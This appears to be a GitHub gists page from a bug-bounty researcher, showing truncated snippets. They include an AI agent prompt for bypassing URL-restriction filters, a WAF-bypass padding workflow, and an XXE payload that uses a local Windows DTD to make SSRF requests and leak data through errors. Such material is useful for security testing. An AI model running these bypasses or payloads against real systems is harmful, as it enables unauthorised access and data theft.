Justin Gardner Rhynorater

URL Fuzzer Agent

You are the master of all URL formats. You wrote all the RFCs and have them all memorized word for word. You're focused and adderalled up and ready to try to bypass URL restrictions.

The user has provided you with a URL that needs to be bypassed. Here is how to go about it:

  1. Try different protocols than the one present. Try at minimum, http, https, javascript (if that makes sense), ftp, custom.
  2. Try only protocol:data like http:site.com. Also try with one slash http:/site.com and mix in uses of \ where interesting
  3. Also, if applicable to the situation, try the // trick to get a path that looks relative to be absolute. Use \ here as well.
  4. Fuzz the domain portion. Figure out if subdomains of the site are permitted. Check if you can include trailing dots.
  5. Check for dot-based regex misconfigurations
@Rhynorater
Rhynorater / gist:c42604466d182e624e8800f1e5b75c39
Created November 11, 2024 22:46
GreHack Signature Workflow
{
"description": "",
"edition": 2,
"graph": {
"edges": [
{
"source": {
"exec_alias": "exec",
"node_id": 0
},
@Rhynorater
Rhynorater / nowafpls___8KB.json
Created May 26, 2024 12:37
nowafpls - Caido Convert Workflow
{
"description": "Bypass WAFs with 8KB Padding.",
"edition": 2,
"graph": {
"edges": [
{
"source": {
"exec_alias": "exec",
"node_id": 2
},
@Rhynorater
Rhynorater / docker-compose.yaml
Created December 6, 2023 20:10
CTBBPodcast WordPress Testing Environment
version: "3.8"
# NOTE! This docker container has hard-coded values for passwords - this is intentional as this is a testing machine. DO NOT EXPOSE TO THE INTERNET.
services:
  database:
    image: mariadb:10.6.4-focal
    restart: unless-stopped
    ports:
      - 3306:3306
    environment:
      MYSQL_ROOT_PASSWORD: 'CTBB_ROOT_PASSWD'
<!DOCTYPE doc [
<!ENTITY % local_dtd SYSTEM "file:///C:\Windows\System32\wbem\xml\cim20.dtd">
<!ENTITY % SuperClass '>
<!ENTITY &#x25; file SYSTEM "http://example.com:9200/_cat/indices">
<!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file://test/#&#x25;file;&#x27;>">
&#x25;eval;
&#x25;error;
<!ENTITY test "test"'
>
%local_dtd;
@Rhynorater
Rhynorater / README.md
Created January 25, 2023 19:05
Quick little solution to add port forwarding to WSL on windows

addPortForward.ps1

$port = $args[0]
netsh interface portproxy add v4tov4 listenport=$port listenaddress=0.0.0.0 connectport=$port connectaddress=(wsl bash ~/.getIP.sh)

=============

@Rhynorater
Rhynorater / myaccountmain.js
Created April 22, 2022 22:04
myaccountmain.js
!(function (I, e) {
if ("object" == typeof exports && "object" == typeof module)
module.exports = e();
else if ("function" == typeof define && define.amd) define([], e);
else {
var o = e();
for (var t in o) ("object" == typeof exports ? exports : I)[t] = o[t];
}
})(self, function () {
{
"site": {
"externalURL": "http://NOPE.com/",
"auth.providers": [
{
"type": "builtin"
}
],
"search.largeFiles": [
"*.js"
@Rhynorater
Rhynorater / Demo.sol
Created October 18, 2021 04:24
Example of Differences in Data Locations When Creating New Variables (Storage -> Storage vs Storage -> Memory)
pragma solidity ^0.8.0;
contract Demo{
event log(string data);
string public d= "This is a variable";
string public mv = "changed";
string public mv2 = "changed2";
constructor () {
string storage x = d;
string storage y = x; // Change this to: string memory y = x;
@Rhynorater
Rhynorater / createWalletFromPrivateKey.js
Created October 15, 2021 10:53
Create JSON Wallet from Private Key and Password
var Web3 = require('web3');
const fs = require('fs')
const inquirer = require('inquirer')
var questions = [
{
type: 'input',
name: 'privateKey',
message: "What is your privateKey?"
},
{